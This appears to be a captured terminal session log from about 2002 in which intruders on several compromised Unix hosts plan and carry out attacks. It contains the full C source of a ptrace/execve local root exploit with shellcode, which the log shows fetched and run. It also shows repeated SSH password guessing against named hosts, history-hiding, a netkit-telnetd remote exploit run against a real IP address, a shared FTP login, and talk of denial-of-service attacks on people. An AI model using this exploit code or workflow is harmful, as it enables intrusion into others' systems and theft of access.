find: /proc/17581/fd/5: No such file or directory
find: /proc/17581/fd/5: No such file or directory
find: /etc/default: Permission denied
find: /etc/httpd/conf/ssl.crl: Permission denied
find: /etc/httpd/conf/ssl.crt: Permission denied
find: /etc/httpd/conf/ssl.csr: Permission denied
find: /etc/httpd/conf/ssl.key: Permission denied
find: /etc/httpd/conf/ssl.prm: Permission denied
find: /root: Permission denied
[glen@fran glen]$ cat z
/usr/bin/at
/usr/bin/suidperl
/usr/bin/sperl5.6.0
/usr/bin/lockfile
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/slocate
/usr/bin/passwd
/usr/bin/wall
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/write
/usr/bin/ssh
/usr/bin/crontab
/usr/sbin/traceroute
/usr/sbin/utempter
/usr/sbin/sendmail
/usr/sbin/usernetctl
/usr/sbin/suexec
/bin/ping
/bin/mount
/bin/umount
/bin/su
/sbin/pwdb_chkpwd
/sbin/unix_chkpwd
/sbin/netreport
[glen@fran glen]$ cat z | xargs ls -l
-rwsr-xr-x    1 root     root        56508 Apr 30  2001 /bin/mount
-rwsr-xr-x    1 root     root        22620 Jan 16  2001 /bin/ping
-rwsr-xr-x    1 root     root        14112 Jan 16  2001 /bin/su
-rwsr-xr-x    1 root     root        25148 Apr 30  2001 /bin/umount
-rwxr-sr-x    1 root     root         4160 Sep 21 11:11 /sbin/netreport
-r-sr-xr-x    1 root     root        15120 Nov  9 10:33 /sbin/pwdb_chkpwd
-r-sr-xr-x    1 root     root        16856 Nov  9 10:33 /sbin/unix_chkpwd
-rwsr-xr-x    1 root     root        37764 Apr  4  2001 /usr/bin/at
-rwsr-xr-x    1 root     root        34588 Mar  9  2001 /usr/bin/chage
-rws--x--x    1 root     root        13136 Dec  4 17:55 /usr/bin/chfn
-rws--x--x    1 root     root        12484 Dec  4 17:55 /usr/bin/chsh
-rwsr-xr-x    1 root     root        21312 Mar  8  2001 /usr/bin/crontab
-rwsr-xr-x    1 root     root        36228 Mar  9  2001 /usr/bin/gpasswd
-rwxr-sr-x    1 root     mail        12440 Jul  3  2001 /usr/bin/lockfile
-rws--x--x    1 root     root         5456 Dec  4 17:55 /usr/bin/newgrp
-r-s--x--x    1 root     root        13536 Jul 12  2000 /usr/bin/passwd
-rwxr-sr-x    1 root     slocate     24508 Feb 26  2001 /usr/bin/slocate
-rws--x--x    2 root     root       795092 Mar 23  2001 /usr/bin/sperl5.6.0
-rwsr-xr-x    1 root     root       212300 Dec  3 14:18 /usr/bin/ssh
-rws--x--x    2 root     root       795092 Mar 23  2001 /usr/bin/suidperl
-r-xr-sr-x    1 root     tty          6492 Jun 21  2001 /usr/bin/wall
-rwxr-sr-x    1 root     tty          8744 Dec  4 17:55 /usr/bin/write
-r-sr-xr-x    1 root     root       455620 Oct 14 04:52 /usr/sbin/sendmail
-r-s--x---    1 root     apache      11296 Nov 15 14:53 /usr/sbin/suexec
-rwsr-xr-x    1 root     root        18256 Dec  1  2000 /usr/sbin/traceroute
-rwsr-xr-x    1 root     root         6392 Sep 21 11:11 /usr/sbin/usernetctl
-rwxr-sr-x    1 root     utmp         6584 Jul 12  2000 /usr/sbin/utempter
[glen@fran glen]$ wget    ]2;screen]2;   Wuff  ----  Wuff!!  lynx ]2;screen]2;g
len@fran.fifthavenuevideo.com: /home/glen-source www.netspace.net.au/~hellman/2
.c
/* 

[8C20.10.2001
[8Cexploits the ptrace/execve kernel bug
[8Cbased on Nergel's exp. recoded by Moo0
[8C[8C
[8Cthis isnt the old bug, tested on slack kernels:
[8C2.2.19 & 2.4.4

[8Cit requirez writing permission in working directory (try /tmp)

[8Cthis assums su/newgrp arent PAM based.
[8C
*/



#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define FILE "./TMP"

void runprog(void) {

struct stat st;
unlink(FILE);
while (stat(FILE,&st));

usleep(1000);

execl("/usr/bin/gpasswd","passwd",0);

perror("execl");

exit(-1);

}
char code[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80"
"\xeb\x25\x5e\x89\xf3\x83\xc3\xe0\x89\x73\x28\x31\xc0\x88\x43\x27\x89\x43"
"\x2c\x83\xe8\xf5\x8d\x4b\x28\x8d\x53\x2c\x89\xf3\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xd6\xff\xff\xff/bin/sh" ;

unsigned long getaddr(int pid) {

        int fd,i;
        char file[32],tmp[100],*ptr;

        snprintf(file,sizeof(file)-1,"/proc/%d/maps",pid);

        fd = open(file,0);

        if (fd < 0) {
                perror(file);
               return(0);
                }

        for (;read(fd,tmp,sizeof(tmp));)
             {
                ptr = (char *)strstr(tmp,"00:00");
                if (ptr) {
      ptr-=32;
                        return(strtoul(ptr,NULL,16));
                        }
                }

                fprintf(stderr,"cant allocate free memory at %s.\n",file);
                return(0);

}
void inject(int pid) {

struct user_regs_struct save;
int i,dword,size;
unsigned int address;

bzero(&save,sizeof(save));

i = ptrace(PTRACE_GETREGS,pid,0,&save);
if (i) { perror("get"); exit(-1); }

size = strlen(code);

address = getaddr(pid);

save.eip = address;

 while (size % 4 != 0) size++;

  for(i=0;ipw_name);
[8Cpass = getpass(buf);
[8C}


i = ptrace(PTRACE_ATTACH,pid,0,0);
if (i) {
[8Cperror("attach");
[8Cexit(0); }

waitpid(pid,NULL,WUNTRACED);

i = ptrace(PTRACE_CONT,pid,0,0);
if (i) perror("cont");

fputs("Now sit back and enjoy the ride...\n",stderr);

if (!fork()) { 
[8Cusleep(700000);
[8Cunlink(FILE);
[8Cif (argc == 1) strcat(pass,"\n");
[8Celse { pass = buf; strcpy(pass,"blah\n"); }
[8C while (*pass && !ioctl(0, TIOCSTI, pass++));
[8Cusleep(400000);
[8Csprintf(buf,"exec %s Moo0 %d\n",argv[0],pid);
[8Cpass = buf;
[8C while (*pass && !ioctl(0, TIOCSTI, pass++));
[8Cexit(0);
[8C}

creat(FILE,0777);


if (argc == 1) execl("/bin/su","su",pw->pw_name,0);
else execl("/usr/bin/newgrp","newgrp",0);

perror("execl");

}




[glen@fran glen]$ lynx -source www.netspace.net.au/~hellman/2.c > 2.c
[glen@fran glen]$ gcc -=      ]2;screen]2;   Wuff  ----  Wuff!!  gcc ]2;screen]
2;glen@fran.fifthavenuevideo.com: /home/glen-o 2 2.c
bash: gcc: command not found
[glen@fran glen]$ wtf
[glen@fran glen]$ whereis sgicc
sgicc:
[glen@fran glen]$ whereis gcc
gcc:
[glen@fran glen]$ uname -a
Linux fran.fifthavenuevideo.com 2.4.2-2smp #1 SMP Sun Apr 8 19:15:45 EDT 2001 i
5
[glen@fran glen]$ wheries cc
bash: wheries: command not found
[glen@fran glen]$ find / -name gcc
find: /home/jparis: Permission denied
find: /home/drussell: Permission denied
find: /home/fran/mail: Permission denied
find: /usr/lib/pgsql/backup: Permission denied
find: /var/lib/slocate: Permission denied
find: /var/lib/pgsql/backups: Permission denied
find: /var/lib/pgsql/data: Permission denied
find: /var/lib/mysql/mysql: Permission denied
find: /var/lib/mysql/test: Permission denied
find: /var/lib/mysql/watsekacomm: Permission denied
find: /var/spool/at: Permission denied
find: /var/spool/cron: Permission denied
find: /proc/1/fd: Permission denied
find: /proc/2/fd: Permission denied
find: /proc/3/fd: Permission denied
find: /proc/4/fd: Permission denied
find: /proc/5/fd: Permission denied
find: /proc/6/fd: Permission denied
find: /proc/7/fd: Permission denied
find: /proc/431/fd: Permission denied
find: /proc/436/fd: Permission denied
find: /proc/557/fd: Permission denied
find: /proc/572/fd: Permission denied
find: /proc/607/fd: Permission denied
find: /proc/641/fd: Permission denied
find: /proc/647/fd: Permission denied
find: /proc/648/fd: Permission denied
find: /proc/657/fd: Permission denied
find: /proc/676/fd: Permission denied
find: /proc/700/fd: Permission denied
find: /proc/738/fd: Permission denied
find: /proc/739/fd: Permission denied
find: /proc/740/fd: Permission denied
find: /proc/741/fd: Permission denied
find: /proc/742/fd: Permission denied
find: /proc/743/fd: Permission denied
find: /proc/3417/fd: Permission denied
find: /proc/4417/fd: Permission denied
find: /proc/12263/fd: Permission denied
find: /proc/12264/fd: Permission denied
find: /proc/12265/fd: Permission denied
find: /proc/12266/fd: Permission denied
find: /proc/12267/fd: Permission denied
find: /proc/12268/fd: Permission denied
find: /proc/12269/fd: Permission denied
find: /proc/12270/fd: Permission denied
find: /proc/17543/fd: Permission denied
find: /etc/default: Permission denied
find: /etc/httpd/conf/ssl.crl: Permission denied
find: /etc/httpd/conf/ssl.crt: Permission denied
find: /etc/httpd/conf/ssl.csr: Permission denied
find: /etc/httpd/conf/ssl.key: Permission denied
find: /etc/httpd/conf/ssl.prm: Permission denied
find: /root: Permission denied
[glen@fran glen]$ no compiler
[glen@fran glen]$ rm 2.c
[glen@fran glen]$ rm z
[glen@fran glen]$ next boz x heh
[glen@fran glen]$ o wait
[glen@fran glen]$ lynx -source www.netspace.net.au/` ~hellman/2

[glen@fran glen]$ lynx -source www.netspace.net.au/~hellman/2 > 2
[glen@fran glen]$ ls -la 2
-rw-rw-r--    1 glen     glen        20694 Jan 14 02:48 2
[glen@fran glen]$ chmod +x 2
[glen@fran glen]$ ./2
using /bin/su
kernel ptrace/execve race condition exploit by Moo0
enter glen's password: 
Now sit back and enjoy the ride...
Password: 
exec ./2 Moo0 17626
su: incorrect password



how
did  o u detach this shit ?
 ctrl-c?^X
control-z then kill ?


ugh sec
[glen@fran glen]$ 
[glen@fran glen]$ control-z then kill ?
bash: control-z: command not found
[glen@fran glen]$ 
[glen@fran glen]$ 
[glen@fran glen]$ ugh sec
[glen@fran glen]$ ./2
using /bin/su
kernel ptrace/execve race condition exploit by Moo0
enter glen's password: 
Now sit back and enjoy the ride...
Password: 
exec ./2 Moo0 17666
[glen@fran glen]$ exec ./2 Moo0 17666
get: No such process







[glen@fran glen]$ 
[glen@fran glen]$ rm 2
[glen@fran glen]$ ssh
Usage: ssh [options] host [command]
Options:
  -l user     Log in using this user name.
  -n          Redirect input from /dev/null.
  -A          Enable authentication agent forwarding.
  -a          Disable authentication agent forwarding.
  -X          Enable X11 connection forwarding.
  -x          Disable X11 connection forwarding.
  -i file     Identity for public key authentication (default: ~/.ssh/identity)
  -t          Tty; allocate a tty even if command is given.
  -T          Do not allocate a tty.
  -v          Verbose; display verbose debugging messages.
              Multiple -v increases verbosity.
  -V          Display version number only.
  -P          Don't allocate a privileged port.
  -q          Quiet; don't display any warning messages.
  -f          Fork into background after authentication.
  -e char     Set escape character; ``none'' = disable (default: ~).
  -c cipher   Select encryption algorithm: ``3des'', ``blowfish''
  -m macs     Specify MAC algorithms for protocol version 2.
  -p port     Connect to this port.  Server must be on the same port.
  -L listen-port:host:port   Forward local port to remote address
  -R listen-port:host:port   Forward remote port to local address
              These cause ssh to listen for connections on a port, and
              forward them to the other side by connecting to host:port.
  -C          Enable compression.
  -N          Do not execute a shell or command.
  -g          Allow remote hosts to connect to forwarded ports.
  -1          Force protocol version 1.
  -2          Force protocol version 2.
  -4          Use IPv4 only.
  -6          Use IPv6 only.
  -o 'option' Process the option as if it was read from a configuration file.
  -s          Invoke command (mandatory) as SSH2 subsystem.
[glen@fran glen]$ s
[glen@fran glen]$ 
[glen@fran glen]$ 
[glen@fran glen]$ ssh narcbb@narcbb.org
The authenticity of host 'narcbb.org (216.36.201.52)' can't be established.
RSA1 key fingerprint is 7e:9c:3a:35:65:c2:03:d0:d3:00:e3:f0:2a:87:2c:e7.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'narcbb.org,216.36.201.52' (RSA1) to the list of kno
w
narcbb@narcbb.org's password: 
Last login: Mon Jan 14 00:18:49 2002 from eris.io.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Please observe that the following are NOT allowed:

  *Any ATTEMPT to undermine the system or to gain unauthorized access.
  *Use our system to attack other systems.
  *Warez, IRC or IRC robots.
  *Adult content or links to them.
  *Spamming (the sending of mass UNSOLICITED emails).
  *Non-Java chat rooms.  Java chat rooms are available for a fee.

Any violators will be subject to immediate account disablement.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
   Also, please observe any copyright restrictions.

   Thank you.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
No mail.
]2;screen]2;narcbb@cobain.siteprotect.com: /home/narcbbcobain:~$ unset HISTFILE
cobain:~$ w
Error: /proc must be mounted
  To mount /proc at boot you need an /etc/fstab line like:
      /proc   /proc   proc    defaults
  In the meantime, mount /proc /proc -t proc
cobain:~$ uname -a
Linux cobain.siteprotect.com 2.4.15-pre8 #1 Wed Nov 21 13:16:53 CST 2001 i686 u
n
cobain:~$ stipeproject             ]2;screen]2;   Wuff  ----  Wuff!!  stile]2;s
creen]2;narcbb@cobain.siteprotect.com: /home/narcbb hehe
cobain:~$ dns
bash: dns: command not found
cobain:~$ /bin/dns
bash: /bin/dns: No such file or directory
cobain:~$ /bin/     ]2;screen]2;   Wuff  ----  Wuff!!  ]2;screen]2;narcbb@cobai
n.siteprotect.com: /home/narcbbexit
logout
[H[H[2J[15LConnection to narcbb.org closed.
]2;screen]2;glen@fran.fifthavenuevideo.com: /home/glen[glen@fran glen]$ ssh hab
bakuk@ageofdragons.com
The authenticity of host 'ageofdragons.com (208.204.46.28)' can't be establishe
d
RSA key fingerprint is 92:8f:91:5a:9d:f8:4d:ce:5e:be:a8:56:15:fb:a9:b4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'ageofdragons.com,208.204.46.28' (RSA) to the list o
f
habbakuk@ageofdragons.com's password: 
Permission denied, please try again.
habbakuk@ageofdragons.com's password: 
[glen@fran glen]$ ssh draith@rakis.net
The authenticity of host 'rakis.net (207.8.143.12)' can't be established.
RSA key fingerprint is 36:dd:21:9a:62:95:e6:8c:b9:7b:72:a7:24:4f:73:28.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'rakis.net,207.8.143.12' (RSA) to the list of known 
h
draith@rakis.net's password: 
Permission denied, please try again.
draith@rakis.net's password: 
[glen@fran glen]$ cant b      ]2;screen]2;   Wuff  ----  Wuff!!  ]2;screen]2;gl
en@fran.fifthavenuevideo.com: /home/glenssh bashful@ignite.blackened.net
The authenticity of host 'ignite.blackened.net (216.66.74.129)' can't be establ
i
RSA key fingerprint is 14:d9:c4:ae:54:d9:fd:6e:b7:76:81:e8:1f:3b:02:ef.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'ignite.blackened.net,216.66.74.129' (RSA) to the li
s
bashful@ignite.blackened.net's password: 
Permission denied, please try again.
bashful@ignite.blackened.net's password: 
[glen@fran glen]$ ssh -l marke 209.48.190.41
The authenticity of host '209.48.190.41 (209.48.190.41)' can't be established.
[H[2M[22BRSA key fingerprint is ec:07:8a:8a:23:10:b1:16:6a:f5:2e:84:dc:f2:2d:bb
.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '209.48.190.41' (RSA) to the list of known hosts.
marke@209.48.190.41's password: 
Permission denied, please try again.
marke@209.48.190.41's password: 
[glen@fran glen]$ ssh -l seanw 209.48.190.41
seanw@209.48.190.41's password: 
Permission denied, please try again.
seanw@209.48.190.41's password: 
[glen@fran glen]$ ssh -l pulp 209.48.190.41
pulp@209.48.190.41's password: 
Permission denied, please try again.
pulp@209.48.190.41's password: 
Permission denied, please try again.
pulp@209.48.190.41's password: 
[glen@fran glen]$ ssh -l wchang 209.48.190.41
wchang@209.48.190.41's password: 
Permission denied, please try again.
wchang@209.48.190.41's password: 
[glen@fran glen]$ 
[glen@fran glen]$ ssh -l mthomas 209.48.190.41
mthomas@209.48.190.41's password: 
Permission denied, please try again.
mthomas@209.48.190.41's password: 
[glen@fran glen]$ exit
logout
[H[H[2J[15LConnection to fran.fifthavenuevideo.com closed.
marcos@leaf[~]10: nd

CORRECT>end (y|n|e|a)? no
nd: Command not found.
marcos@leaf[~]11: c
[H[H[2Jmarcos@leaf[~]12: nc

CORRECT>c (y|n|e|a)? 
[Kmarcos@leaf[~]12: exit
logout
Connection to aladdin.danforthcenter.org closed.
bob@kas:~$ nc -p 4438 209.48.190.41 21
nc: cannot establish connection: Connection refused
bob@kas:~$ nc -p 4438 209.48.190.41 21 2

bob@kas:~$ nc -p 4438 209.48.190.41 22 3
nc: cannot establish connection: Connection refused
bob@kas:~$ nc -p 4438 209.48.190.41 23 5
imback!!
220 Moebius.baked.net ESMTP Sendmail 8.9.3/8.9.3; Mon, 14 Jan 2002 02:54:23 -05
0
500 Command unrecognized: "imback!!"

bob@kas:~$ nc -p 4438 209.48.190.41 25
nc: cannot establish connection: Cannot assign requested address
bob@kas:~$ nc -p 4438 209.48.190.41 25
nc: cannot establish connection: Cannot assign requested address
bob@kas:~$ nc -p 4438 209.48.190.41 25  110
+OK Cubic Circle's v1.31 1998/05/13 POP3 ready <7f230000b78e423c@Moebius>

bob@kas:~$ forgot the pass ghe
bob@kas:~$ 
bob@kas:~$ try the ones you know.  which ones do you 
bob@kas:~$ nc -p 4438 209.48.190.41 110[P25
nc: cannot establish connection: Cannot assign requested address
bob@kas:~$ gotta wait for the time_sync to delay out
bob@kas:~$ pd uses like 15 of em on a ra otating p basis heh
bob@kas:~$ nc -p 4438 209.48.190.41 25110[P25
nc: cannot establish connection: Cannot assign requested address
bob@kas:~$ nc -p 4438 209.48.190.41 25
nc: cannot establish connection: Cannot assign requested address
bob@kas:~$ nc
[8C
Usage:
[8C
[8Cnc [-46nh] [-p port] [-s addr] hostname port
[8Cnc -l -p port [-s addr] [-46nh] [hostname] [port]

Recognized options are:
[4C-4[9CUse only IPv4
[4C-6[9CUse only IPv6
[4C-l[9CListen mode, for inbound connects
[4C-s addr[4CLocal source address
[4C-p port[4CLocal source port
[4C-n[9CNumeric-only IP addresses, no DNS
[4C-h[9CDisplay help
[H[2M[23Bbob@kas:~$ nc -p 4438 209.48.190.41 25
220 Moebius.baked.net ESMTP Sendmail 8.9.3/8.9.3; Mon, 14 Jan 2002 02:55:34 -05
0

bob@kas:~$ ok fuckj this lets just hack from heere
bob@kas:~$ su -
You are not authorized to su root
bob@kas:~$ su kas = -
Access to su to that account DENIED.
You are not authorized to su kas
bob@kas:~$ ssh h -l root localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
RSA key fingerprint is c2:d9:c9:36:30:a8:58:f4:c5:3e:11:b6:0c:1a:de:a9.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
root@localhost's password: 
Last login: Mon Jan 14 18:31:21 2002 from d252-ps4-mel.alphalink.com.au
Linux 2.2.20-ow1-hap-2-lbsd1.
root@kas:~# k
root@kas:~# cd /stuff
root@kas:/stuff# cd ~bob
root@kas:/home/bob# ls -la
total 28
drwx--x--x    4 bob      users        4096 Jan 14 18:35 [1m[34m.[m/
drwxr-xr-x   24 root     root         4096 Jan 14 18:29 [1m[34m..[m/
-rw-r--r--    1 bob      users          34 Jan 14 18:29 .less
-rw-r--r--    1 bob      users         114 Jan 14 18:29 .lessrc
drwx------    2 bob      users        4096 Jan 14 18:30 [1m[34m.screen[m/
-rw-r--r--    1 bob      users        3394 Jan 14 18:29 .screenrc
drwx------    2 bob      users        4096 Jan 14 18:36 [1m[34m.ssh[m/
root@kas:/home/bob# k
root@kas:/home/bob# whawt ats pdlo oiyto
root@kas:/home/bob# u want me to do ?
root@kas:/home/bob# what     ]2;screen]2;   Wuff  ----  Wuff!!  what d]2;screen
]2;glen@fran.fifthavenuevideo.com: /home/glenid uw ant to do ?
root@kas:/home/bob# iw ant tlhis etrhs'6.2 box
root@kas:/home/bob# whicn 1
root@kas:/home/bob# telnet 157.238.46.35 23
Trying 157.238.46.35...
Connected to 157.238.46.35.
Escape character is '^]'.

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.19 on an i686
login: 
telnet> quit
Connection closed.
root@kas:/home/bob# telnet 157.238.46.35 23 1
Trying 157.238.46.35...
Connected to 157.238.46.35.
Escape character is '^]'.
220 ProFTPD 1.2.4 Server (ProFTPD) [yellow.srv2.com]
^]
telnet> quit
Connection closed.
root@kas:/home/bob# i need ot put file on ur box wh  hwo do i do it
root@kas:/home/bob# where is ur file 
root@kas:/home/bob# telentd exploit that 
root@kas:/home/bob# sctu  ut wrote 4 me
root@kas:/home/bob# just ftp kas.net.au bob / hackerbob
root@kas:/home/bob# put sploit
root@kas:/home/bob# exi
root@kas:/home/bob# hehe
root@kas:/home/bob# or ftp from here same shit
root@kas:/home/bob# telnet 157.238.46.35 213
root@kas:/home/bob# ls -la                 telnet 157.238.46.35 23 5
Trying 157.238.46.35...
Connected to 157.238.46.35.
Escape character is '^]'.
220-yellow.srv2.com ESMTP Exim 3.34 #1 Mon, 14 Jan 2002 00:58:36 -0700 
220-We do not authorize the use of this system to transport unsolicited, 
220 and/or bulk e-mail.
^]
telnet> quit
Connection closed.
root@kas:/home/bob# thats vuln too it hink
root@kas:/home/bob# imme sec
root@kas:/home/bob# ls -a
[1m[34m.[m/  [1m[34m..[m/  .less  .lessrc  [1m[34m.screen[m/  .screenrc  [1m[34
m.ssh[m/  [1m[32mx[m*
root@kas:/home/bob# ./x

  netkit-telnetd exploit by qitest1

Usage: ./x [options]
Options:
  -h hostname
  -t target
  -l location
Available targets:
  0) Red Hat 6.2 with telnetd from default installation
  1) Red Hat 6.2 with netkit-telnet-0.16 from tar.gz
  2) Red Hat 7.0 with telnetd from default installation
  3) Red Hat 7.1 with telnetd from default installation
  4) Debian 2.2r3 potato with telnetd from default installation
root@kas:/home/bob# what box?
bash: what: command not found
root@kas:/home/bob# 
root@kas:/home/bob# 157.238.46.35
root@kas:/home/bob# ./x   telnet 157.238.46.35
Trying 157.238.46.35...
Connected to 157.238.46.35.
Escape character is '^]'.

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.19 on an i686
login: 
telnet> quit
Connection closed.
root@kas:/home/bob# ./x 

  netkit-telnetd exploit by qitest1

Usage: ./x [options]
Options:
  -h hostname
  -t target
  -l location
Available targets:
  0) Red Hat 6.2 with telnetd from default installation
  1) Red Hat 6.2 with netkit-telnet-0.16 from tar.gz
  2) Red Hat 7.0 with telnetd from default installation
  3) Red Hat 7.1 with telnetd from default installation
  4) Debian 2.2r3 potato with telnetd from default installation
root@kas:/home/bob# ./x 157.238.46.35.               -h 157.238.46.35. -t0;rm .
/x

  netkit-telnetd exploit by qitest1

+Looking for the hostname in the AYT answer at 157.238.46.35...
  found: 
+Host: 157.238.46.35
  as: Red Hat 6.2 with telnetd from default installation
+Connecting to 157.238.46.35...
  connected
+Telnet protocol rules...
  yeah
+Setting 2 env var...
  done
+Calculating some stuff...
  done, fildap.ayt_n: 1644 and fildap.opt_n: 8
+Filling for char: 0xffffffcc...
  done
+Calculating some stuff...
  done, fildap.ayt_n: 1644 and fildap.opt_n: 11
+Filling for char: 0x10...
  done
+Calculating some stuff...
  done, fildap.ayt_n: 1642 and fildap.opt_n: 19
+Filling for char: 0x69...
  done
+Calculating some stuff...
  done, fildap.ayt_n: 1638 and fildap.opt_n: 36
+Filling for char: 0x68...
  done
+Calculating some stuff...
  done, fildap.ayt_n: 1633 and fildap.opt_n: 57
+Filling for char: 0x69...
  done
+Building fake chunk and shellcode area...
  done, with padding: 3128, location: 0x80503f4 and retaddr: 0x8057438
+Working for you...
  dude
+Waiting for a real root shell...
  i0x69 rulez! =)
connect(): Connection refused
root@kas:/home/bob# NOT VULN D00D
root@kas:/home/bob# 
root@kas:/home/bob# you want 
root@kas:/home/bob# you want to call me?
root@kas:/home/bob# w ls -a
[1m[34m.[m/  [1m[34m..[m/  .less  .lessrc  [1m[34m.screen[m/  .screenrc  [1m[34
m.ssh[m/
root@kas:/home/bob# last bob |,ore              last bob |more
bob               pts/20   mystic.uprising. Mon Jan 14 19:04   still logged in
bob               pts/18   61.129.67.238    Mon Jan 14 18:33   still logged in
bob               pts/17   mystic.uprising. Mon Jan 14 18:32   still logged in
bob               pts/14   localhost        Mon Jan 14 18:30 - 19:07  (00:36)

wtmp begins Thu Jan  1 00:36:18 1970
root@kas:/home/bob# hmmmm
root@kas:/home/bob# anytnig else u want to try so far?
root@kas:/home/bob# !tel
telnet 157.238.46.35
Trying 157.238.46.35...
Connected to 157.238.46.35.
Escape character is '^]'.
^C
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.19 on an i686

telnet> quit
Connection closed.
root@kas:/home/bob# telnet 157.238.46.35 1
Trying 157.238.46.31...
telnet: Unable to connect to remote host: Connection refused
root@kas:/home/bob# 
root@kas:/home/bob# telnet 157.238.46.31 5 21
Trying 157.238.46.35...
Connected to 157.238.46.35.
Escape character is '^]'.
220 ProFTPD 1.2.4 Server (ProFTPD) [yellow.srv2.com]
^]
telnet> quit
Connection closed.
root@kas:/home/bob# i forgot what proftpd is vuln too
root@kas:/home/bob# er fuck i di  i dun got an acct
root@kas:/home/bob# brb gonna try saomething
bash: brb: command not found
root@kas:/home/bob# watit a sec.  trying something
root@kas:/home/bob# trying to root me ? heh
root@kas:/home/bob# uhmm no.  this is root.  why would anyone do that
root@kas:/home/bob# heh i duno
root@kas:/home/bob# u prolly got things that i duno wh  bout
root@kas:/home/bob# /bin/login maybe
root@kas:/home/bob# i prolly got things u dun o  o about .. 
root@kas:/home/bob# let's see them :)
root@kas:/home/bob# their on phix which i dont got aces to for a ef
root@kas:/home/bob# you got any more accnts on scuts fboxesew days?
root@kas:/home/bob# naa i i never did have any did i 
root@kas:/home/bob# ?
root@kas:/home/bob# the one you tried earlier you said was scuts. i think he us
e[H[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P[45Cs it. kalifironia
[H[4h                                   
[4lConnected to 157.238.46.35.
[4h                                   
[4lEscape character is '^]'.
[4h                                   
[4l220 ProFTPD 1.2.4 Server (ProFTPD)
[4h                                   
[4l^]
[4h                                   
[4ltelnet> quit
[4h                                   
[4lConnection closed.
[4h                                   
[4lroot@kas:/home/bob# i forgot what p
[4h                                   
[4lroot@kas:/home/bob# er fuck i i dun
[4h                                   
[4lroot@kas:/home/bob# brb gonna try s
[4h                                   
[4lbash: brb: command not found
[4h                                   
[4lroot@kas:/home/bob# watit a sec.  t
[4h                                   
[4lroot@kas:/home/bob# trying to root
[4h                                   
[4lroot@kas:/home/bob# uhmm no.  this
[4h                                   
[4lroot@kas:/home/bob# heh i duno
[4h                                   
[4lroot@kas:/home/bob# u prolly got th
[4h                                   
[4lroot@kas:/home/bob# /bin/login mayb
[4h                                   
[4lroot@kas:/home/bob# i prolly got th
[4h                                   
[4lroot@kas:/home/bob# let's see them
[4h                                   
[4lroot@kas:/home/bob# their on phix w
[4h                                   
[4lroot@kas:/home/bob# you got any mor
[4h                                   
[4lroot@kas:/home/bob# naa i never did
[4h                                   
[4lroot@kas:/home/bob# ?
[4h                                   
[4lroot@kas:/home/bob# the one you tri
[4h                                   
[4lroot@kas:/home/bob# oh
root@kas:/home/bob# i got the passwd file
root@kas:/home/bob# but its again on phix 
root@kas:/home/bob# \;
root@kas:/home/bob# we should dos some people.  i'm in that kind of mood
root@kas:/home/bob# ssh -l marauder@phix.com
Usage: ssh [options] host [command]
Options:
  -l user     Log in using this user name.
  -n          Redirect input from /dev/null.
  -F config   Config file (default: ~/.ssh/config).
  -A          Enable authentication agent forwarding.
  -a          Disable authentication agent forwarding (default).
  -X          Enable X11 connection forwarding.
  -x          Disable X11 connection forwarding (default).
  -i file     Identity for public key authentication (default: ~/.ssh/identity)
  -t          Tty; allocate a tty even if command is given.
  -T          Do not allocate a tty.
  -v          Verbose; display verbose debugging messages.
              Multiple -v increases verbosity.
  -V          Display version number only.
  -P          Don't allocate a privileged port.
  -q          Quiet; don't display any warning messages.
  -f          Fork into background after authentication.
  -e char     Set escape character; ``none'' = disable (default: ~).
  -c cipher   Select encryption algorithm
  -m macs     Specify MAC algorithms for protocol version 2.
  -p port     Connect to this port.  Server must be on the same port.
  -L listen-port:host:port   Forward local port to remote address
  -R listen-port:host:port   Forward remote port to local address
              These cause ssh to listen for connections on a port, and
              forward them to the other side by connecting to host:port.
  -D port     Enable dynamic application-level port forwarding.
  -C          Enable compression.
  -N          Do not execute a shell or command.
  -g          Allow remote hosts to connect to forwarded ports.
  -1          Force protocol version 1.
  -2          Force protocol version 2.
  -4          Use IPv4 only.
  -6          Use IPv6 only.
  -o 'option' Process the option as if it was read from a configuration file.
  -s          Invoke command (mandatory) as SSH2 subsystem.
  -b addr     Local IP address.
root@kas:/home/bob# ssh marauder@phix.com
The authenticity of host 'phix.com (199.120.223.1)' can't be established.
RSA1 key fingerprint is c2:40:ec:23:1a:6b:b9:35:23:fd:0c:df:d1:eb:e7:3a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'phix.com,199.120.223.1' (RSA1) to the list of known
 
marauder@phix.com's password: 
Permission denied, please try again.
marauder@phix.com's password: 
Permission denied, please try again.
marauder@phix.com's password: 

root@kas:/home/bob# damn
root@kas:/home/bob# marauder - ti 1bbetz
root@kas:/home/bob# let's dos seome boxxes
root@kas:/home/bob# yah k sec leme find some nicks heh
root@kas:/home/bob# tail
ravint.net
apple.cored.org
fcae.acast.nova.edu
157.238.46.35
redpanda.jp




root@kas:/home/bob# tail
is fcae stil li386
yep
let's dos the guy taht took the nick bob
root@kas:/home/bob# unless u have better ideas
root@kas:/home/bob# tail
| bob (uridas@NS1.1115.NET) (Internic Network)
heh wtf host is that
root@kas:/home/bob# traceroute NS1.1115.NET
traceroute to NS1.1115.NET (64.56.106.202), 30 hops max, 40 byte packets
